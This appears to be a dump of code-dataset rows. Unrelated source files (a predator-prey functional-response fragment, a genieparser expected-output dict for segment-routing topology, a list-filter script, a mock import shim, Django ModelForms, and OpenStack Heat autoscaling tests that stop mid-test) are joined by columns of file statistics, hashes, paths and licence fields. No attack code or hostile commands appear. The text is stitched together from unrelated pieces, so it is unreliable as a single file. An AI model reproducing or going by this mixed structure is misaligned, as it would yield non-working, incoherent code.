# return verhulst(number_of_preys) - (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys**2)
# def hollingIIIPredator(number_of_preys:float, number_of_predators:float):
# return -Constants.PREDATOR_MORTALITY_RATE * number_of_predators + (Constants.SEARCH_TIME * Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)/(1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys**2 * number_of_predators)
def malthusAnalytic(time:float):
return Constants.INITIAL_NUMBER_OF_PREYS * exp(Constants.PREY_GROWTH_RATE * time)
def lotkaVolterraFunctionalResponse(number_of_preys:float, number_of_predators:float):
return Constants.PREDATOR_PREDATION_RATE * number_of_preys * number_of_predators
def gauseFunctionalResponse(number_of_preys:float, number_of_predators:float):
return (number_of_preys ** Constants.PREDATOR_SATIETY) * number_of_predators
def hollingIIFunctionalResponse(number_of_preys:float, number_of_predators:float):
return (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys * number_of_predators) / (1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys)
def hollingIIIFunctionalResponse(number_of_preys:float, number_of_predators:float):
return (Constants.PREDATION_RATE_PER_UNIT_OF_TIME * number_of_preys ** 2 * number_of_predators) / (1 + Constants.PREDATION_RATE_PER_UNIT_OF_TIME * Constants.CAPTURE_TIME * number_of_preys ** 2)
| 49.822785
| 273
| 0.834604
| 525
| 3,936
| 5.771429
| 0.100952
| 0.211221
| 0.163036
| 0.077228
| 0.830693
| 0.828713
| 0.828713
| 0.827723
| 0.827723
| 0.782178
| 0
| 0.004197
| 0.091972
| 3,936
| 79
| 274
| 49.822785
| 0.843593
| 0.368902
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.464286
| false
| 0
| 0.071429
| 0.464286
| 1
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
7f4b57d5321d450f9a6f6a05230c7f810785d248
| 5,348
|
py
|
Python
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 204
|
2018-06-27T00:55:27.000Z
|
2022-03-06T21:12:18.000Z
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 468
|
2018-06-19T00:33:18.000Z
|
2022-03-31T23:23:35.000Z
|
src/genie/libs/parser/iosxe/tests/ShowSegmentRoutingTrafficEngTopology/cli/equal/golden_output_expected.py
|
balmasea/genieparser
|
d1e71a96dfb081e0a8591707b9d4872decd5d9d3
|
[
"Apache-2.0"
] | 309
|
2019-01-16T20:21:07.000Z
|
2022-03-30T12:56:41.000Z
|
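# Expected parsed structure for the ShowSegmentRoutingTrafficEngTopology golden CLI output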
expected_output = {
"nodes": {
1: {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
"prefix_sid": {
"prefix": "10.19.198.239",
"label": 16073,
"label_type": "regular",
"domain_id": 0,
"flags": "N , E",
},
"links": {
0: {
"local_address": "10.19.198.26",
"remote_address": "10.19.198.25",
"local_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 0,
"admin_groups": "0x00000000",
"adj_sid": {"18": "unprotected", "36": "protected"},
},
1: {
"local_address": "10.19.198.30",
"remote_address": "10.19.198.29",
"local_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.253",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 0,
"admin_groups": "0x00000000",
"adj_sid": {"37": "unprotected", "38": "protected"},
},
},
},
2: {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
"prefix_sid": {
"prefix": "10.189.5.252",
"label": 16071,
"label_type": "regular",
"domain_id": 0,
"flags": "N",
},
"links": {
0: {
"local_address": "10.19.198.25",
"remote_address": "10.19.198.26",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.19.198.239",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 1000, "te": 1000, "delay": 1000},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"24": "protected"},
},
1: {
"local_address": "10.169.14.122",
"remote_address": "10.169.14.121",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.169.14.240",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 100, "te": 100, "delay": 100},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"16": "protected"},
},
2: {
"local_address": "10.189.5.93",
"remote_address": "10.189.5.94",
"local_node": {
"ospf_router_id": "10.189.5.252",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"remote_node": {
"ospf_router_id": "10.189.5.253",
"area_id": 8,
"domain_id": 0,
"asn": 65109,
},
"metric": {"igp": 5, "te": 5, "delay": 5},
"bandwidth_total": 125000000,
"bandwidth_reservable": 125000000,
"admin_groups": "0x00000000",
"adj_sid": {"19": "protected"},
},
},
},
}
}
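A short sketch of reading values back out of this nested golden output, flattening every adjacency SID with its protection state per advertising router; the helper name collect_adj_sids is introduced here only for illustration.

def collect_adj_sids(topology):
    # Walk nodes -> links -> adj_sid and flatten into (router_id, sid, protection) tuples.
    rows = []
    for node in topology["nodes"].values():
        router_id = node["ospf_router_id"]
        for link in node["links"].values():
            for sid, protection in link["adj_sid"].items():
                rows.append((router_id, sid, protection))
    return rows

print(collect_adj_sids(expected_output))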
| 38.2
| 72
| 0.318063
| 411
| 5,348
| 3.907543
| 0.170316
| 0.069738
| 0.078456
| 0.104608
| 0.856164
| 0.780822
| 0.780822
| 0.749689
| 0.711083
| 0.711083
| 0
| 0.207038
| 0.543007
| 5,348
| 139
| 73
| 38.47482
| 0.450082
| 0
| 0
| 0.647482
| 0
| 0
| 0.28721
| 0
| 0
| 0
| 0.009349
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
f6c71a9c8857036356d792c6b8870e6cc2cf4fe4
| 751
|
py
|
Python
|
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
positve and negative.py
|
sxd7/p_ython
|
b215a63e4da541b5850b57b16e582b4e20940e6e
|
[
"MIT"
] | null | null | null |
list1 = [12,-7,5,64,-14]
print("original numbers in the list:",list1)
new_list1 = list(filter(lambda x: x>=0,list1))
print("positive numbers in the list:",new_list1)
list2 = [12,14,-95,3]
print("original numbers in the list:",list2)
new_list2 = list(filter(lambda x: x>=0,list2))
print("positive numbers in the list:",new_list2)
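The same filtering can also be written with a list comprehension; a brief equivalent sketch:

list1 = [12, -7, 5, 64, -14]
positives = [x for x in list1 if x >= 0]  # keep only non-negative values
print("positive numbers in the list:", positives)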
| 28.884615
| 49
| 0.684421
| 120
| 751
| 4.216667
| 0.191667
| 0.142292
| 0.189723
| 0.252964
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0.913043
| 0
| 0.11828
| 0.133156
| 751
| 25
| 50
| 30.04
| 0.658986
| 0
| 0
| 0.842105
| 0
| 0
| 0.313514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.421053
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
10070252e6683d7dcc73ac484dfcdf953fd04880
| 178
|
py
|
Python
|
tests/testapp/sixmock.py
|
douleutaras/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 66
|
2016-09-17T10:44:01.000Z
|
2021-04-30T14:18:08.000Z
|
tests/testapp/sixmock.py
|
PaesslerAG/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 21
|
2016-10-04T11:31:53.000Z
|
2019-07-25T16:16:17.000Z
|
tests/testapp/sixmock.py
|
douleutaras/django-performance-testing
|
62e230441d9c662cbc81888555614135d03063c1
|
[
"BSD-3-Clause"
] | 9
|
2016-10-10T07:07:30.000Z
|
2020-01-03T21:11:44.000Z
|
try:
from unittest.mock import patch, Mock, PropertyMock, MagicMock # noqa: E501
except ImportError:
from mock import patch, Mock, PropertyMock, MagicMock # noqa: F401
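A brief sketch of the shim in use; it patches a real standard-library function chosen purely for illustration.

import os

def test_patch_and_mock():
    # patch() swaps os.getcwd for a MagicMock within the with-block only.
    with patch('os.getcwd', return_value='/tmp/fake'):
        assert os.getcwd() == '/tmp/fake'
    # Mock() builds a stand-in whose return value is configured up front.
    stub = Mock(return_value=42)
    assert stub() == 42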
| 35.6
| 80
| 0.741573
| 22
| 178
| 6
| 0.590909
| 0.151515
| 0.227273
| 0.287879
| 0.666667
| 0.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0.041379
| 0.185393
| 178
| 4
| 81
| 44.5
| 0.868966
| 0.117978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1201f15319d9ec46c8bc0a93658cd7b05a649fe3
| 5,483
|
py
|
Python
|
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
carrara/archivi/forms.py
|
cxc61cxc/django_prove
|
9df58be73ef51e13287bfbd1b8623f3f39b8a224
|
[
"MIT"
] | null | null | null |
from django import forms
from django.forms import ModelForm
from .models import Pratica
class PraticaAdd(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
widgets = {
'origine' : forms.TextInput(attrs={'class':'form-control'}),
'tipo' : forms.TextInput(attrs={'class':'form-control'}),
'istruttoria' : forms.TextInput(attrs={'class':'form-control'}),
'pos' : forms.TextInput(attrs={'class':'form-control'}),
'data_prot_gen' : forms.DateInput(),
'prot_gen' : forms.TextInput(attrs={'class':'form-control'}),
'prot_urb' : forms.TextInput(attrs={'class':'form-control'}),
'num_atto' : forms.TextInput(attrs={'class':'form-control'}),
'data_atto' : forms.DateInput(),
'atto' : forms.TextInput(attrs={'class':'form-control'}),
'richiedente' : forms.TextInput(attrs={'class':'form-control','autofocus': True}),
'l_nasc' : forms.TextInput(attrs={'class':'form-control'}),
'd_nasc' : forms.DateInput(),
'citta' : forms.TextInput(attrs={'class':'form-control'}),
'residenza' : forms.TextInput(attrs={'class':'form-control'}),
'cod_fisc' : forms.TextInput(attrs={'class':'form-control'}),
'oggetto' : forms.Textarea(attrs={'class':'form-control', 'rows':2, 'cols':15}),
'ubicazione' : forms.TextInput(attrs={'class':'form-control'}),
'fg' : forms.TextInput(attrs={'class':'form-control'}),
'mapp' : forms.TextInput(attrs={'class':'form-control'}),
'com_edil' : forms.TextInput(attrs={'class':'form-control'}),
'data_ce' : forms.DateInput(),
'tecnico' : forms.TextInput(attrs={'class':'form-control'}),
}
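# HTML5 date widget: renders <input type="date"> instead of the default text input.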
class DateInput(forms.DateInput):
input_type = 'date'
class RichiedenteForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('richiedente',)
class MappaleForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('fg','mapp',)
class TitoloForm(forms.ModelForm):
class Meta:
model = Pratica
fields = ('atto',)
class IndirizzoForm(forms.ModelForm):
civico = forms.CharField(
widget=forms.TextInput(attrs={'readonly':'readonly'})
)
class Meta:
model = Pratica
fields = ('ubicazione',)
class PraticaRegistration(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
widgets = {
'origine' : forms.TextInput(attrs={'class':'form-control'}),
'tipo' : forms.TextInput(attrs={'class':'form-control'}),
'istruttoria' : forms.TextInput(attrs={'class':'form-control'}),
'pos' : forms.TextInput(attrs={'class':'form-control'}),
'data_prot_gen' : forms.DateInput(),
'prot_gen' : forms.TextInput(attrs={'class':'form-control'}),
'prot_urb' : forms.TextInput(attrs={'class':'form-control'}),
'num_atto' : forms.TextInput(attrs={'class':'form-control'}),
'data_atto' : forms.DateInput(),
'atto' : forms.TextInput(attrs={'class':'form-control'}),
'richiedente' : forms.TextInput(attrs={'class':'form-control','autofocus': True}),
'l_nasc' : forms.TextInput(attrs={'class':'form-control'}),
'd_nasc' : forms.DateInput(),
'citta' : forms.TextInput(attrs={'class':'form-control'}),
'residenza' : forms.TextInput(attrs={'class':'form-control'}),
'cod_fisc' : forms.TextInput(attrs={'class':'form-control'}),
'oggetto' : forms.Textarea(attrs={'class':'form-control', 'rows':2, 'cols':15}),
'ubicazione' : forms.TextInput(attrs={'class':'form-control'}),
'fg' : forms.TextInput(attrs={'class':'form-control'}),
'mapp' : forms.TextInput(attrs={'class':'form-control'}),
'com_edil' : forms.TextInput(attrs={'class':'form-control'}),
'data_ce' : forms.DateInput(),
'tecnico' : forms.TextInput(attrs={'class':'form-control'}),
}
class PraticaDetail(forms.ModelForm):
class Meta:
model = Pratica
fields = ('__all__')
'''
class AllegatoAdd(forms.ModelForm):
class Meta:
model = Allegato
fields = ('nome','doc',)
widgets = {
'nome' : forms.TextInput(attrs={'class':'form-control', 'required':True}),
'doc' : forms.FileInput(attrs={'class':'form-control'}),
'pratica' : forms.HiddenInput(),
}
class ContactForm(forms.Form):
from_email = forms.EmailField(required=True)
subject = forms.CharField(required=True)
message = forms.CharField(widget=forms.Textarea, required=True)
'''
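A hedged sketch of how PraticaAdd would typically be wired into a view, assuming this module sits in an app package as the path carrara/archivi/forms.py suggests; the view name, URL name and template path are assumptions for illustration only.

from django.shortcuts import redirect, render
from .forms import PraticaAdd

def pratica_add(request):
    # Bind POST data on submit, otherwise render an unbound form.
    form = PraticaAdd(request.POST or None)
    if request.method == 'POST' and form.is_valid():
        form.save()  # ModelForm persists a new Pratica instance
        return redirect('pratica_list')  # assumed URL name
    return render(request, 'archivi/pratica_add.html', {'form': form})  # assumed template path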
| 37.813793
| 104
| 0.511581
| 480
| 5,483
| 5.76875
| 0.160417
| 0.144456
| 0.202239
| 0.303359
| 0.781871
| 0.762008
| 0.749368
| 0.704948
| 0.689057
| 0.689057
| 0
| 0.001623
| 0.325734
| 5,483
| 144
| 105
| 38.076389
| 0.747363
| 0
| 0
| 0.755814
| 0
| 0
| 0.221676
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.034884
| 0
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
122b0e425201a5525e0e9ee06bb0586ff0fef20f
| 56,983
|
py
|
Python
|
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
heat/tests/test_autoscaling.py
|
citrix-openstack-build/heat
|
fa31873529481472e037e3ce157b87f8057fe622
|
[
"Apache-2.0"
] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import copy
import mox
from testtools import skipIf
from oslo.config import cfg
from heat.common import template_format
from heat.common import exception
from heat.engine.resources import autoscaling as asc
from heat.engine.resources import loadbalancer
from heat.engine.resources import instance
from heat.engine.resources.neutron import loadbalancer as neutron_lb
from heat.engine import parser
from heat.engine import resource
from heat.engine import scheduler
from heat.engine.resource import Metadata
from heat.openstack.common import timeutils
from heat.openstack.common.importutils import try_import
from heat.tests.common import HeatTestCase
from heat.tests import fakes
from heat.tests import utils
neutronclient = try_import('neutronclient.v2_0.client')
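# AWS-style template shared by every test below: an AutoScalingGroup of 1-5
# instances behind an ElasticLoadBalancer, plus scale-up and scale-down policies.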
as_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "AutoScaling Test",
"Parameters" : {
"ImageId": {"Type": "String"},
"KeyName": {"Type": "String"}
},
"Resources" : {
"WebServerGroup" : {
"Type" : "AWS::AutoScaling::AutoScalingGroup",
"Properties" : {
"AvailabilityZones" : ["nova"],
"LaunchConfigurationName" : { "Ref" : "LaunchConfig" },
"MinSize" : "1",
"MaxSize" : "5",
"LoadBalancerNames" : [ { "Ref" : "ElasticLoadBalancer" } ]
}
},
"WebServerScaleUpPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "1"
}
},
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : { "Ref" : "WebServerGroup" },
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"ElasticLoadBalancer" : {
"Type" : "AWS::ElasticLoadBalancing::LoadBalancer",
"Properties" : {
"AvailabilityZones" : ["nova"],
"Listeners" : [ {
"LoadBalancerPort" : "80",
"InstancePort" : "80",
"Protocol" : "HTTP"
}]
}
},
"LaunchConfig" : {
"Type" : "AWS::AutoScaling::LaunchConfiguration",
"Properties": {
"ImageId" : {"Ref": "ImageId"},
"InstanceType" : "bar",
}
}
}
}
'''
class AutoScalingTest(HeatTestCase):
dummy_instance_id = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
params = {'KeyName': 'test', 'ImageId': 'foo'}
def setUp(self):
super(AutoScalingTest, self).setUp()
utils.setup_dummy_db()
cfg.CONF.set_default('heat_waitcondition_server_url',
'http://server.test:8000/v1/waitcondition')
self.fc = fakes.FakeKeystoneClient()
def create_scaling_group(self, t, stack, resource_name):
# create the launch configuration resource
conf = stack.resources['LaunchConfig']
self.assertEqual(None, conf.validate())
scheduler.TaskRunner(conf.create)()
self.assertEqual((conf.CREATE, conf.COMPLETE), conf.state)
# create the group resource
rsrc = stack.resources[resource_name]
self.assertEqual(None, rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
return rsrc
def create_scaling_policy(self, t, stack, resource_name):
rsrc = stack.resources[resource_name]
self.assertEqual(None, rsrc.validate())
scheduler.TaskRunner(rsrc.create)()
self.assertEqual((rsrc.CREATE, rsrc.COMPLETE), rsrc.state)
return rsrc
def _stub_validate(self):
self.m.StubOutWithMock(parser.Stack, 'validate')
parser.Stack.validate().MultipleTimes()
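    # Stub Instance.handle_create/check_create_complete so 'num' instances
    # appear to build successfully without creating real servers.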
def _stub_create(self, num):
self._stub_validate()
self.m.StubOutWithMock(instance.Instance, 'handle_create')
self.m.StubOutWithMock(instance.Instance, 'check_create_complete')
cookie = object()
for x in range(num):
instance.Instance.handle_create().AndReturn(cookie)
instance.Instance.check_create_complete(cookie).AndReturn(False)
instance.Instance.check_create_complete(
cookie).MultipleTimes().AndReturn(True)
def _stub_lb_reload(self, num, unset=True, nochange=False):
expected_list = [self.dummy_instance_id] * num
if unset:
self.m.VerifyAll()
self.m.UnsetStubs()
if num > 0:
self.m.StubOutWithMock(instance.Instance, 'FnGetRefId')
instance.Instance.FnGetRefId().MultipleTimes().AndReturn(
self.dummy_instance_id)
self.m.StubOutWithMock(loadbalancer.LoadBalancer, 'handle_update')
if nochange:
loadbalancer.LoadBalancer.handle_update(
mox.IgnoreArg(), mox.IgnoreArg(), {}).AndReturn(None)
else:
loadbalancer.LoadBalancer.handle_update(
mox.IgnoreArg(), mox.IgnoreArg(),
{'Instances': expected_list}).AndReturn(None)
def _stub_meta_expected(self, now, data, nmeta=1):
# Stop time at now
self.m.StubOutWithMock(timeutils, 'utcnow')
timeutils.utcnow().MultipleTimes().AndReturn(now)
# Then set a stub to ensure the metadata update is as
# expected based on the timestamp and data
self.m.StubOutWithMock(Metadata, '__set__')
expected = {timeutils.strtime(now): data}
# Note for ScalingPolicy, we expect to get a metadata
# update for the policy and autoscaling group, so pass nmeta=2
for x in range(nmeta):
Metadata.__set__(mox.IgnoreArg(), expected).AndReturn(None)
def test_scaling_delete_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '0'
properties['MaxSize'] = '0'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(0)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(None, rsrc.FnGetAtt("InstanceList"))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_adjust_down_empty(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['MinSize'] = '1'
properties['MaxSize'] = '1'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# Reduce the min size to 0, should complete without adjusting
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['MinSize'] = '0'
scheduler.TaskRunner(rsrc.update, update_snippet)()
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
# trigger adjustment to reduce to 0, there should be no more instances
self._stub_lb_reload(0)
self._stub_meta_expected(now, 'ChangeInCapacity : -1')
self.m.ReplayAll()
rsrc.adjust(-1)
self.assertEqual([], rsrc.get_instance_names())
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_update_replace(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
update_snippet = copy.deepcopy(rsrc.parsed_template())
update_snippet['Properties']['AvailabilityZones'] = ['foo']
updater = scheduler.TaskRunner(rsrc.update, update_snippet)
self.assertRaises(resource.UpdateReplace, updater)
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
inst_cookie = (object(), object(), object())
instance.Instance.handle_suspend().AndReturn(inst_cookie)
instance.Instance.check_suspend_complete(inst_cookie).AndReturn(False)
instance.Instance.check_suspend_complete(inst_cookie).AndReturn(True)
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume(self):
t = template_format.parse(as_template)
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(1)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 1')
self._stub_create(1)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0'], rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_resume')
self.m.StubOutWithMock(instance.Instance, 'check_resume_complete')
inst_cookie = (object(), object(), object())
instance.Instance.handle_resume().AndReturn(inst_cookie)
instance.Instance.check_resume_complete(inst_cookie).AndReturn(False)
instance.Instance.check_resume_complete(inst_cookie).AndReturn(True)
self.m.ReplayAll()
rsrc.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
for i in rsrc.nested().resources.values():
i.state_set(rsrc.SUSPEND, rsrc.COMPLETE)
scheduler.TaskRunner(rsrc.resume)()
self.assertEqual(rsrc.state, (rsrc.RESUME, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_suspend_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
self.assertEqual(['WebServerGroup-0', 'WebServerGroup-1'],
rsrc.get_instance_names())
self.assertEqual(rsrc.state, (rsrc.CREATE, rsrc.COMPLETE))
self.m.VerifyAll()
self.m.UnsetStubs()
self.m.StubOutWithMock(instance.Instance, 'handle_suspend')
self.m.StubOutWithMock(instance.Instance, 'check_suspend_complete')
inst_cookie1 = ('foo1', 'foo2', 'foo3')
inst_cookie2 = ('bar1', 'bar2', 'bar3')
instance.Instance.handle_suspend().InAnyOrder().AndReturn(inst_cookie1)
instance.Instance.handle_suspend().InAnyOrder().AndReturn(inst_cookie2)
instance.Instance.check_suspend_complete(inst_cookie1).InAnyOrder(
).AndReturn(True)
instance.Instance.check_suspend_complete(inst_cookie2).InAnyOrder(
).AndReturn(True)
self.m.ReplayAll()
scheduler.TaskRunner(rsrc.suspend)()
self.assertEqual(rsrc.state, (rsrc.SUSPEND, rsrc.COMPLETE))
rsrc.delete()
self.m.VerifyAll()
def test_scaling_group_resume_multiple(self):
t = template_format.parse(as_template)
properties = t['Resources']['WebServerGroup']['Properties']
properties['DesiredCapacity'] = '2'
stack = utils.parse_stack(t, params=self.params)
self._stub_lb_reload(2)
now = timeutils.utcnow()
self._stub_meta_expected(now, 'ExactCapacity : 2')
self._stub_create(2)
self.m.ReplayAll()
rsrc = self.create_scaling_group(t, stack, 'WebServerGroup')
self.assertEqual(utils.PhysName(stack.name, rsrc.name),
rsrc.FnGetRefId())
